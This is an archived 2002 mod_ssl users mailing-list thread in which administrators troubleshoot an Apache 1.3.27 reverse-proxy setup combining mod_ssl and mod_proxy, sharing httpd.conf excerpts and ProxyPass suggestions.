> > If it's not "included" when I "default" compile (using the INSTALL-file
> > instructions), how do I know how to compile in the mod_ssl into the apache
> > (if this is my first time)?
> >
> > Where do I find information about these things, I certanly dont install
> > apache at a regulary basis.. ;-)
> >
> > I noted a default config file for SSL (I also found an include into the
> > httpd.config-file) and used the command:
> >
> > %>httpd -DSSL -k start
> >
> > .. but it(apache) couldnt find the mod_ssl.. Why? If it's included I
> > shouldnt bother or?... Something I missed?
> >
> > All help will be appricated.
> >
> > Thanks...
> >
> > /Johan
> >
> > ps. Thinking of using Apache 1.3.7 instead due to the extended source of
> > good documentation...
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
> 
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
> 
> testing, only testing, and damn good at it too!
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:19:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21029; Thu, 5 Dec 2002 19:18:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc03.attbi.com id TAA21008; Thu, 5 Dec 2002 19:17:51 +0100 (MET)
Received: from hm2k (12-240-105-132.client.attbi.com[12.240.105.132])
          by sccrmhc03.attbi.com (sccrmhc03) with SMTP
          id <2002120518174400300jjhile>; Thu, 5 Dec 2002 18:17:44 +0000
From: "HMajidy" 
To: 
Subject: mod_ssl & mod_proxy
Date: Thu, 5 Dec 2002 10:12:21 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_008E_01C29C46.CCBD5880"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "HMajidy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_008E_01C29C46.CCBD5880
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

This is to report a problem with Apache with mod_ssl and mod_proxy, and to
request the community’s help in resolving it.



Objective: The objective is to set up Apache as a reverse proxy, to receive
encrypted HTTPS traffic over the Internet and to convert it to HTTP and
direct it to a web server through a firewall.



Problem: Apache seems to be redirecting traffic to the virtual hosts on the
local filesystem correctly, but mod_proxy does not seem to send requests to
remote URL (as specified by ProxyRemote directive below). SSL does display
correct certificate from requesting browser.



Troubleshooting Steps Taken: Experimenting with the target URL (IP and
hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass) I
have not been able to establish that proxy is doing anything at all.

Apache has been recompiled with mod_ssl and mod_proxy as DSOs as well as
statically linked in modules.



Here’s the system configuration:

Linux version 2.2.16-22smp

gcc version egcs-2.91.66

Server version: Apache/1.3.27 (Unix)

Compiled-in modules:

  http_core.c

  mod_env.c

  mod_log_config.c

  mod_mime.c

  mod_negotiation.c

  mod_status.c

  mod_include.c

  mod_autoindex.c

  mod_dir.c

  mod_cgi.c

  mod_asis.c

  mod_imap.c

  mod_actions.c

  mod_userdir.c

  mod_alias.c

  mod_access.c

  mod_auth.c

  mod_proxy.c

  mod_setenvif.c

  mod_ssl.c

OpenSSL 0.9.6g 9 August 2002



httpd.conf

AddModule mod_proxy.c



    ProxyRequests off

    NoCache *

    AllowCONNECT 443,80

    

        Order Allow,Deny

        Allow from All

    

ProxyRemote * http://1.2.3.4:85



NameVirtualHost *

Listen *:443



        SSLEngine on

        ServerName www.mydomain.com

        DocumentRoot /usr/local/apache/htdocs

        ErrorLog logs/443-error_log



Listen *:80



    ServerAdmin hamid@mydomain.com

    DocumentRoot /usr/local/apache/www

    ServerName www1.mydomain.com

    ErrorLog logs/80-error_log





Can anyone see a conflict or omission in this configuration? Does anyone
have these two modules working together in a reverse proxy scenario? Any
help or suggestions would be appreciated.



Regards,

Hamid.



PS. Please reply to hmajidy@attbi.com as well as to this list.


------=_NextPart_000_008E_01C29C46.CCBD5880
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









This is to report a problem with Apache with =
mod_ssl and=20
mod_proxy, and to request the community=92s help in resolving it.  


 


Objective: The objective is to set up Apache as a reverse =
proxy, to=20
receive encrypted HTTPS traffic over the Internet and to convert it to =
HTTP and=20
direct it to a web server through a firewall.


 


Problem: Apache seems to be redirecting traffic to the virtual =
hosts on=20
the local filesystem correctly, but mod_proxy does not seem to send =
requests to=20
remote URL (as specified by ProxyRemote directive below). SSL does =
display=20
correct certificate from requesting browser.


 


Troubleshooting Steps Taken: Experimenting with the target URL =
(IP and=20
hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass) I =
have=20
not been able to establish that proxy is doing anything at =
all.


Apache has been recompiled with mod_ssl and mod_proxy as DSOs =
as well as=20
statically linked in modules.


 


Here=92s the system configuration:


Linux version 2.2.16-22smp


gcc version egcs-2.91.66


Server version: Apache/1.3.27 (Unix)


Compiled-in modules:


 =20
http_core.c


 =20
mod_env.c


 =20
mod_log_config.c


 =20
mod_mime.c


 =20
mod_negotiation.c


 =20
mod_status.c


 =20
mod_include.c


 =20
mod_autoindex.c


 =20
mod_dir.c


 =20
mod_cgi.c


 =20
mod_asis.c


 =20
mod_imap.c


 =20
mod_actions.c


 =20
mod_userdir.c


 =20
mod_alias.c


 =20
mod_access.c


 =20
mod_auth.c


 =20
mod_proxy.c


 =20
mod_setenvif.c


 =20
mod_ssl.c


OpenSSL 0.9.6g 9 August 2002


 


httpd.conf


AddModule mod_proxy.c


<IfModule mod_proxy.c>


   =20
ProxyRequests off


   =20
NoCache *


   =20
AllowCONNECT 443,80


   =20
<Directory />


       =20
Order Allow,Deny


        =
Allow from=20
All


   =20
</Directory>


ProxyRemote * http://1.2.3.4:85


</IfModule>


NameVirtualHost *


Listen *:443


<VirtualHost _default_:443>


       =20
SSLEngine on


       =20
ServerName www.mydomain.com


       =20
DocumentRoot /usr/local/apache/htdocs


       =20
ErrorLog logs/443-error_log


</VirtualHost>


Listen *:80


<VirtualHost *:80>


   =20
ServerAdmin hamid@mydomain.com


   =20
DocumentRoot /usr/local/apache/www


   =20
ServerName www1.mydomain.com


   =20
ErrorLog logs/80-error_log


</VirtualHost>


 


Can anyone see a conflict or omission in this configuration? =
Does anyone=20
have these two modules working together in a reverse proxy scenario? Any =
help or=20
suggestions would be appreciated.


 


Regards,


Hamid.


 


PS. Please reply to hmajidy@attbi.com as well as to this=20
list.


------=_NextPart_000_008E_01C29C46.CCBD5880--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:31:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21419; Thu, 5 Dec 2002 19:30:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mercury.pricegrabber.com id TAA21344; Thu, 5 Dec 2002 19:29:03 +0100 (MET)
Received: from wednesday.noc.pricegrabber.com (wednesday.noc.pricegrabber.com [192.168.9.1])
	(authenticated bits=0)
	by mercury.pricegrabber.com (8.12.6/8.12.6) with ESMTP id gB5ISt2l011057
	for ; Thu, 5 Dec 2002 10:28:56 -0800
Subject: Re: mod_ssl & mod_proxy
From: Christopher McCrory 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain; charset=UTF-8
Organization: Pricegrabber
Message-Id: <1039112934.5531.10.camel@wednesday.noc.pricegrabber.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.0 (1.2.0-1) 
Date: 05 Dec 2002 10:28:55 -0800
Content-Transfer-Encoding: 8bit
X-RAVMilter-Version: 8.3.3(snapshot 20020312) (mercury.pricegrabber.com)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher McCrory 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello...



On Thu, 2002-12-05 at 10:12, HMajidy wrote:
> This is to report a problem with Apache with mod_ssl and mod_proxy,
> and to request the communityÂ’s help in resolving it.  
> 
>  
> 
> Objective: The objective is to set up Apache as a reverse proxy, to
> receive encrypted HTTPS traffic over the Internet and to convert it to
> HTTP and direct it to a web server through a firewall.
> 

>From what I see, you don't have a proxypass directive, ala:


ProxyPass        /foo    http://cruella.pricegrabber.com/foo
ProxyPassReverse /foo    http://cruella.pricegrabber.com/foo


>  
> 
> Problem: Apache seems to be redirecting traffic to the virtual hosts
> on the local filesystem correctly, but mod_proxy does not seem to send
> requests to remote URL (as specified by ProxyRemote directive below).
> SSL does display correct certificate from requesting browser.
> 
>  
> 
> Troubleshooting Steps Taken: Experimenting with the target URL (IP and
> hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass)
> I have not been able to establish that proxy is doing anything at all.
> 
> Apache has been recompiled with mod_ssl and mod_proxy as DSOs as well
> as statically linked in modules.
> 
>  
> 
> HereÂ’s the system configuration:
> 
> Linux version 2.2.16-22smp
> 
> gcc version egcs-2.91.66
> 
> Server version: Apache/1.3.27 (Unix)
> 
> Compiled-in modules:
> 
>   http_core.c
> 
>   mod_env.c
> 
>   mod_log_config.c
> 
>   mod_mime.c
> 
>   mod_negotiation.c
> 
>   mod_status.c
> 
>   mod_include.c
> 
>   mod_autoindex.c
> 
>   mod_dir.c
> 
>   mod_cgi.c
> 
>   mod_asis.c
> 
>   mod_imap.c
> 
>   mod_actions.c
> 
>   mod_userdir.c
> 
>   mod_alias.c
> 
>   mod_access.c
> 
>   mod_auth.c
> 
>   mod_proxy.c
> 
>   mod_setenvif.c
> 
>   mod_ssl.c
> 
> OpenSSL 0.9.6g 9 August 2002
> 
>  
> 
> httpd.conf
> 
> AddModule mod_proxy.c
> 
> 
> 
>     ProxyRequests off
> 
>     NoCache *
> 
>     AllowCONNECT 443,80
> 
>     
> 
>         Order Allow,Deny
> 
>         Allow from All
> 
>     
> 
> ProxyRemote * http://1.2.3.4:85
> 
> 
> 
> NameVirtualHost *
> 
> Listen *:443
> 
> 
> 
>         SSLEngine on
> 
>         ServerName www.mydomain.com
> 
>         DocumentRoot /usr/local/apache/htdocs
> 
>         ErrorLog logs/443-error_log
> 
> 
> 
> Listen *:80
> 
> 
> 
>     ServerAdmin hamid@mydomain.com
> 
>     DocumentRoot /usr/local/apache/www
> 
>     ServerName www1.mydomain.com
> 
>     ErrorLog logs/80-error_log
> 
> 
> 
>  
> 
> Can anyone see a conflict or omission in this configuration? Does
> anyone have these two modules working together in a reverse proxy
> scenario? Any help or suggestions would be appreciated.
> 
>  
> 
> Regards,
> 
> Hamid.
> 
>  
> 
> PS. Please reply to hmajidy@attbi.com as well as to this list.
-- 
Christopher McCrory 
Pricegrabber

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:37:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21700; Thu, 5 Dec 2002 19:36:29 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailrelay.fazenda.sp.gov.br id TAA21643; Thu, 5 Dec 2002 19:35:04 +0100 (MET)
Received: (qmail 24380 invoked from network); 5 Dec 2002 18:35:02 -0000
Received: from unknown (HELO mx1.sede.fazenda.sp.gov.br) ([172.16.32.85])
          (envelope-sender )
          by mailrelay.fazenda.sp.gov.br (qmail-ldap-1.03) with SMTP
          for ; 5 Dec 2002 18:35:02 -0000
Received: (qmail 8984 invoked by uid 50007); 5 Dec 2002 18:34:59 -0000
Received: from asaugusto@fazenda.sp.gov.br by mx1.sede.fazenda.sp.gov.br by uid 50004 with qmail-scanner-1.15 
 (spamassassin: 2.43.  Clear:. 
 Processed in 0.444583 secs); 05 Dec 2002 18:34:59 -0000
X-Qmail-Scanner-Mail-From: asaugusto@fazenda.sp.gov.br via mx1.sede.fazenda.sp.gov.br
X-Qmail-Scanner: 1.15 (Clear:. Processed in 0.444583 secs)
Received: from unknown (HELO fazenda.sp.gov.br) (asaugusto@[172.16.35.233])
          (envelope-sender )
          by mx1.sede.fazenda.sp.gov.br (qmail-ldap-1.03) with SMTP
          for ; 5 Dec 2002 18:34:58 -0000
Message-ID: <3DEF8453.4C552C7E@fazenda.sp.gov.br>
Date: Thu, 05 Dec 2002 14:52:36 -0200
From: Alexandre 
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-16mdk i586)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl & mod_proxy
References: 
Content-Type: multipart/mixed;
 boundary="------------0B177E02EC5F90F57CF072AA"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alexandre 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------0B177E02EC5F90F57CF072AA
Content-Type: multipart/alternative;
 boundary="------------56BCAF3394A481CDDCA2E07E"


--------------56BCAF3394A481CDDCA2E07E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


--------------56BCAF3394A481CDDCA2E07E
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit



oh my God

i have the exactly the same problem ...

the only diference is that my autentication is on Ldap directory in
the internal net

when a click on link http://host.myinternalnet.com

nothing hapen

only the loop

and the apache dont get a request

im sniffing the interfaces but the request dont send ok.

any people can help us ???

thanks

Alexandre

HMajidy wrote:

 

This
is to report a problem with Apache with mod_ssl and mod_proxy, and to request
the community?s help in resolving it.




 <?xml:namespace
prefix = o ns = "urn:schemas-microsoft-com:office:office" />


Objective:
The objective is to set up Apache as a reverse proxy, to receive encrypted
HTTPS traffic over the Internet and to convert it to HTTP and direct it
to a web server through a firewall.





Problem:
Apache seems to be redirecting traffic to the virtual hosts on the local
filesystem correctly, but mod_proxy does not seem to send requests to remote
URL (as specified by ProxyRemote directive below). SSL does display correct
certificate from requesting browser.





Troubleshooting
Steps Taken: Experimenting with the target URL (IP and hosname) and various
proxy directives (ie ProxyPassReverse, ProxyPass) I have not been able
to establish that proxy is doing anything at all.


Apache
has been recompiled with mod_ssl and mod_proxy as DSOs as well as statically
linked in modules.





Here?s
the system configuration:


Linux
version 2.2.16-22smp


gcc
version egcs-2.91.66


Server
version: Apache/1.3.27 (Unix)


Compiled-in
modules:


http_core.c


mod_env.c


mod_log_config.c


mod_mime.c


mod_negotiation.c


mod_status.c


mod_include.c


mod_autoindex.c


mod_dir.c


mod_cgi.c


mod_asis.c


mod_imap.c


mod_actions.c


mod_userdir.c


mod_alias.c


mod_access.c


mod_auth.c


mod_proxy.c


mod_setenvif.c


mod_ssl.c


OpenSSL
0.9.6g 9 August 2002





httpd.conf


AddModule
mod_proxy.c


<IfModule
mod_proxy.c>


ProxyRequests
off


NoCache
*


AllowCONNECT
443,80


<Directory
/>


Order
Allow,Deny


Allow
from All


</Directory>


ProxyRemote
* http://1.2.3.4:85


</IfModule>


NameVirtualHost
*


Listen
*:443


<VirtualHost
_default_:443>


SSLEngine
on


ServerName
www.mydomain.com


DocumentRoot
/usr/local/apache/htdocs


ErrorLog
logs/443-error_log


</VirtualHost>


Listen
*:80


<VirtualHost
*:80>


ServerAdmin
hamid@mydomain.com


DocumentRoot
/usr/local/apache/www


ServerName
www1.mydomain.com


ErrorLog
logs/80-error_log


</VirtualHost>





Can
anyone see a conflict or omission in this configuration? Does anyone have
these two modules working together in a reverse proxy scenario? Any help
or suggestions would be appreciated.





Regards,


Hamid.





PS.
Please reply to hmajidy@attbi.com
as well as to this list.



--------------56BCAF3394A481CDDCA2E07E--

--------------0B177E02EC5F90F57CF072AA
Content-Type: text/x-vcard; charset=us-ascii;
 name="asaugusto.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Alexandre
Content-Disposition: attachment;
 filename="asaugusto.vcf"

begin:vcard 
n:da Silva Augusto;Alexandre 
x-mozilla-html:FALSE
org:Secretaria de Estado dos Negocios da Fazenda;DTI - Departamento de Tecnologia da Informacao
adr:;;;;;;
version:2.1
email;internet:asaugusto@fazenda.sp.gov.br
title:Administrador de Sistemas Unix
x-mozilla-cpt:;3424
fn:Alexandre da Silva Augusto
end:vcard

--------------0B177E02EC5F90F57CF072AA--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:41:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21914; Thu, 5 Dec 2002 19:40:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc01.attbi.com id TAA21885; Thu, 5 Dec 2002 19:39:51 +0100 (MET)
Received: from hm2k (12-240-105-132.client.attbi.com[12.240.105.132])
          by sccrmhc01.attbi.com (sccrmhc01) with SMTP
          id <2002120518394400100csntde>; Thu, 5 Dec 2002 18:39:45 +0000
From: "HMajidy" 
To: 
Subject: RE: mod_ssl & mod_proxy
Date: Thu, 5 Dec 2002 10:34:22 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="UTF-8"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <1039112934.5531.10.camel@wednesday.noc.pricegrabber.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA21893
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "HMajidy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for your reply. The behavior is the same with ProxyPass and ProxyPassReverse instead of ProxyRemote. 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Christopher McCrory
Sent: Thursday, December 05, 2002 10:29 AM
To: modssl-users@modssl.org
Subject: Re: mod_ssl & mod_proxy


Hello...



On Thu, 2002-12-05 at 10:12, HMajidy wrote:
> This is to report a problem with Apache with mod_ssl and mod_proxy,
> and to request the community’s help in resolving it.  
> 
>  
> 
> Objective: The objective is to set up Apache as a reverse proxy, to
> receive encrypted HTTPS traffic over the Internet and to convert it to
> HTTP and direct it to a web server through a firewall.
> 

>From what I see, you don't have a proxypass directive, ala:


ProxyPass        /foo    http://cruella.pricegrabber.com/foo
ProxyPassReverse /foo    http://cruella.pricegrabber.com/foo


>  
> 
> Problem: Apache seems to be redirecting traffic to the virtual hosts
> on the local filesystem correctly, but mod_proxy does not seem to send
> requests to remote URL (as specified by ProxyRemote directive below).
> SSL does display correct certificate from requesting browser.
> 
>  
> 
> Troubleshooting Steps Taken: Experimenting with the target URL (IP and
> hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass)
> I have not been able to establish that proxy is doing anything at all.
> 
> Apache has been recompiled with mod_ssl and mod_proxy as DSOs as well
> as statically linked in modules.
> 
>  
> 
> Here’s the system configuration:
> 
> Linux version 2.2.16-22smp
> 
> gcc version egcs-2.91.66
> 
> Server version: Apache/1.3.27 (Unix)
> 
> Compiled-in modules:
> 
>   http_core.c
> 
>   mod_env.c
> 
>   mod_log_config.c
> 
>   mod_mime.c
> 
>   mod_negotiation.c
> 
>   mod_status.c
> 
>   mod_include.c
> 
>   mod_autoindex.c
> 
>   mod_dir.c
> 
>   mod_cgi.c
> 
>   mod_asis.c
> 
>   mod_imap.c
> 
>   mod_actions.c
> 
>   mod_userdir.c
> 
>   mod_alias.c
> 
>   mod_access.c
> 
>   mod_auth.c
> 
>   mod_proxy.c
> 
>   mod_setenvif.c
> 
>   mod_ssl.c
> 
> OpenSSL 0.9.6g 9 August 2002
> 
>  
> 
> httpd.conf
> 
> AddModule mod_proxy.c
> 
> 
> 
>     ProxyRequests off
> 
>     NoCache *
> 
>     AllowCONNECT 443,80
> 
>     
> 
>         Order Allow,Deny
> 
>         Allow from All
> 
>     
> 
> ProxyRemote * http://1.2.3.4:85
> 
> 
> 
> NameVirtualHost *
> 
> Listen *:443
> 
> 
> 
>         SSLEngine on
> 
>         ServerName www.mydomain.com
> 
>         DocumentRoot /usr/local/apache/htdocs
> 
>         ErrorLog logs/443-error_log
> 
> 
> 
> Listen *:80
> 
> 
> 
>     ServerAdmin hamid@mydomain.com
> 
>     DocumentRoot /usr/local/apache/www
> 
>     ServerName www1.mydomain.com
> 
>     ErrorLog logs/80-error_log
> 
> 
> 
>  
> 
> Can anyone see a conflict or omission in this configuration? Does
> anyone have these two modules working together in a reverse proxy
> scenario? Any help or suggestions would be appreciated.
> 
>  
> 
> Regards,
> 
> Hamid.
> 
>  
> 
> PS. Please reply to hmajidy@attbi.com as well as to this list.
-- 
Christopher McCrory 
Pricegrabber

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:47:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22262; Thu, 5 Dec 2002 19:46:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc02.attbi.com id TAA22218; Thu, 5 Dec 2002 19:45:20 +0100 (MET)
Received: from hm2k (12-240-105-132.client.attbi.com[12.240.105.132])
          by sccrmhc02.attbi.com (sccrmhc02) with SMTP
          id <2002120518450700200j39bse>; Thu, 5 Dec 2002 18:45:08 +0000
From: "HMajidy" 
To: 
Subject: RE: mod_ssl & mod_proxy
Date: Thu, 5 Dec 2002 10:39:45 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0096_01C29C4A.A076AC00"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <3DEF8453.4C552C7E@fazenda.sp.gov.br>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "HMajidy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0096_01C29C4A.A076AC00
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit

Apache does get the requests in my case, as verified in log files created by
CustomLog /usr/local/apache/logs/referer_log referer
CustomLog /usr/local/apache/logs/agent_log agent in httpd.conf. BTW, my LDAP
authentication is handled by the internal (iPlanet) web server.


  -----Original Message-----
  From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Alexandre
  Sent: Thursday, December 05, 2002 8:53 AM
  To: modssl-users@modssl.org
  Subject: Re: mod_ssl & mod_proxy


  oh my God
  i have the exactly the same problem ...
  the only diference is that my autentication is on Ldap directory in the
internal net
  when a click on link http://host.myinternalnet.com
  nothing hapen
  only the loop
  and the apache dont get a request
  im sniffing the interfaces but the request dont send ok.

  any people can help us ???

  thanks

  Alexandre

  HMajidy wrote:


    This is to report a problem with Apache with mod_ssl and mod_proxy, and
to request the community?s help in resolving it.
     

    Objective: The objective is to set up Apache as a reverse proxy, to
receive encrypted HTTPS traffic over the Internet and to convert it to HTTP
and direct it to a web server through a firewall.


    Problem: Apache seems to be redirecting traffic to the virtual hosts on
the local filesystem correctly, but mod_proxy does not seem to send requests
to remote URL (as specified by ProxyRemote directive below). SSL does
display correct certificate from requesting browser.


    Troubleshooting Steps Taken: Experimenting with the target URL (IP and
hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass) I
have not been able to establish that proxy is doing anything at all.

    Apache has been recompiled with mod_ssl and mod_proxy as DSOs as well as
statically linked in modules.


    Here?s the system configuration:

    Linux version 2.2.16-22smp

    gcc version egcs-2.91.66

    Server version: Apache/1.3.27 (Unix)

    Compiled-in modules:

    http_core.c

    mod_env.c

    mod_log_config.c

    mod_mime.c

    mod_negotiation.c

    mod_status.c

    mod_include.c

    mod_autoindex.c

    mod_dir.c

    mod_cgi.c

    mod_asis.c

    mod_imap.c

    mod_actions.c

    mod_userdir.c

    mod_alias.c

    mod_access.c

    mod_auth.c

    mod_proxy.c

    mod_setenvif.c

    mod_ssl.c

    OpenSSL 0.9.6g 9 August 2002


    httpd.conf

    AddModule mod_proxy.c

    

    ProxyRequests off

    NoCache *

    AllowCONNECT 443,80

    

    Order Allow,Deny

    Allow from All

    

    ProxyRemote * http://1.2.3.4:85

    

    NameVirtualHost *

    Listen *:443

    

    SSLEngine on

    ServerName www.mydomain.com

    DocumentRoot /usr/local/apache/htdocs

    ErrorLog logs/443-error_log

    

    Listen *:80

    

    ServerAdmin hamid@mydomain.com

    DocumentRoot /usr/local/apache/www

    ServerName www1.mydomain.com

    ErrorLog logs/80-error_log

    


    Can anyone see a conflict or omission in this configuration? Does anyone
have these two modules working together in a reverse proxy scenario? Any
help or suggestions would be appreciated.


    Regards,

    Hamid.


    PS. Please reply to hmajidy@attbi.com as well as to this list.


------=_NextPart_000_0096_01C29C4A.A076AC00
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable







Apache=20
does get the requests in my case, as verified in log files created by =
CustomLog=20
/usr/local/apache/logs/referer_log referer
CustomLog=20
/usr/local/apache/logs/agent_log agent in httpd.conf. BTW, my LDAP=20
authentication is handled by the internal (iPlanet) web=20
server.


 


 



  
-----Original Message-----
From:=20
  owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]On=20
  Behalf Of Alexandre
Sent: Thursday, December 05, 2002 =
8:53=20
  AM
To: modssl-users@modssl.org
Subject: Re: =
mod_ssl &=20
  mod_proxy

oh my God 
i have the exactly the =
same=20
  problem ... 
the only diference is that my autentication is on Ldap =

  directory in the internal net 
when a click on link http://host.myinternalnet.com =

  
nothing hapen 
only the loop=20
  
and the apache dont get a request 
im sniffing the interfaces =
but the=20
  request dont send ok.=20
  
any people can help us ???=20
  
thanks=20
  
Alexandre=20
  
HMajidy wrote:=20
  
 =20
    
This is to report a problem =
with Apache=20
    with mod_ssl and mod_proxy, and to request the community?s help in =
resolving=20
    it.

    
 <?xml:namespace =
prefix =3D o ns=20
    =3D "urn:schemas-microsoft-co=
m:office:office"=20
    />=20
    
Objective: The objective is =
to set up=20
    Apache as a reverse proxy, to receive encrypted HTTPS traffic over =
the=20
    Internet and to convert it to HTTP and direct it to a web server =
through a=20
    firewall.=20
    

    
Problem: Apache seems to be =
redirecting=20
    traffic to the virtual hosts on the local filesystem correctly, but=20
    mod_proxy does not seem to send requests to remote URL (as specified =
by=20
    ProxyRemote directive below). SSL does display correct certificate =
from=20
    requesting browser.=20
    

    
Troubleshooting Steps =
Taken:=20
    Experimenting with the target URL (IP and hosname) and various proxy =

    directives (ie ProxyPassReverse, ProxyPass) I have not been able to=20
    establish that proxy is doing anything at all.=20
    
Apache has been recompiled =
with mod_ssl=20
    and mod_proxy as DSOs as well as statically linked in =
modules.=20

    

    
Here?s the system=20
    configuration:=20
    
Linux version=20
    2.2.16-22smp=20
    
gcc version =
egcs-2.91.66=20
    
Server version: =
Apache/1.3.27=20
    (Unix)=20
    
Compiled-in =
modules:=20
    
http_core.c=20
    
mod_env.c=20
    
mod_log_config.c=20
    
mod_mime.c=20
    
mod_negotiation.c=20
    
mod_status.c=20
    
mod_include.c=20
    
mod_autoindex.c=20
    
mod_dir.c=20
    
mod_cgi.c=20
    
mod_asis.c=20
    
mod_imap.c=20
    
mod_actions.c=20
    
mod_userdir.c=20
    
mod_alias.c=20
    
mod_access.c=20
    
mod_auth.c=20
    
mod_proxy.c=20
    
mod_setenvif.c=20
    
mod_ssl.c=20
    
OpenSSL 0.9.6g 9 August=20
    2002=20
    

    
httpd.conf=20
    
AddModule =
mod_proxy.c=20
    
<IfModule=20
    mod_proxy.c>=20
    
ProxyRequests off=20
    
NoCache *=20
    
AllowCONNECT 443,80=20
    
<Directory />=20
    
Order Allow,Deny=20
    
Allow from All=20
    
</Directory>=20
    
ProxyRemote * http://1.2.3.4:85=20
    
</IfModule>=20
    
NameVirtualHost =
*=20
    
Listen *:443=20
    
<VirtualHost=20
